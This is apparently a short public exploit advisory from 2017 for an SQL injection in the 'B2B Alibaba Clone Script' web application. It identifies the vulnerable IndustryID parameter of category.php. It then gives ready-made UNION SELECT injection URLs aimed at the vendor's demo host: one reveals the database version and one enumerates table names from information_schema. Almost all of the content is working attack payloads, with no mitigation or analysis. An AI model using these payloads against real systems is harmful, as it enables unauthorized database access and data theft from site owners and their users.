# # # # # # Exploit Title: B2B Alibaba Clone Script - SQL Injection # Google Dork: N/A # Date: 20.01.2017 # Vendor Homepage: https://www.clonescriptsoft.com/ # Software Buy: https://www.clonescriptsoft.com/collections/b2b-alibaba-clone/products/alibaba-clone # Demo: http://alibaba.clonescriptsoft.com/ # Version: N/A # Tested on: Win7 x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[beygir]ihsan[nokta]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/category.php?IndustryID=[SQL] # E.t.c.... # # # # # SQL Injection http://alibaba.clonescriptsoft.com/category.php?IndustryID=-1+union+select+1,2,version() http://alibaba.clonescriptsoft.com/category.php?IndustryID=-1+union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()--